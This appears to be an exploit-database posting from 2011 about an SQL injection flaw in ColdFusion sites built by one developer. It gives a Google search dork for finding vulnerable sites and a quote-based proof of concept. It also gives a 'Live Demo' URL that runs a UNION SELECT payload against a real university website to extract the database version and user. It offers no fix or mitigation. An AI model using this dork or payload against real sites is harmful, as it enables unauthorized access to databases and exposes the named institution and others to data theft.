id: 15849
date: 04/15/2011
title: Site Developed by Magfiroh SQL Injection Vulnerability
author: p0pc0rn
cves: 

Title      : Site Developed by Magfiroh Vulnerable to SQL Injection
Filetype : ColdFusion
Found by : p0pc0rn
Dork     : inurl:".cfm?judul="

SQL
---

http://site.com/parameter.cfm?judul=[SQL]

POC
---

http://site.com/download_detail.cfm?judul=1'

Live Demo
---------

http://www.stiabinabanua.ac.id/download_detail.cfm?judul=30 UNION SELECT 1,2,version(),user(),5,6--



#  0day.today [2023-03-26]  #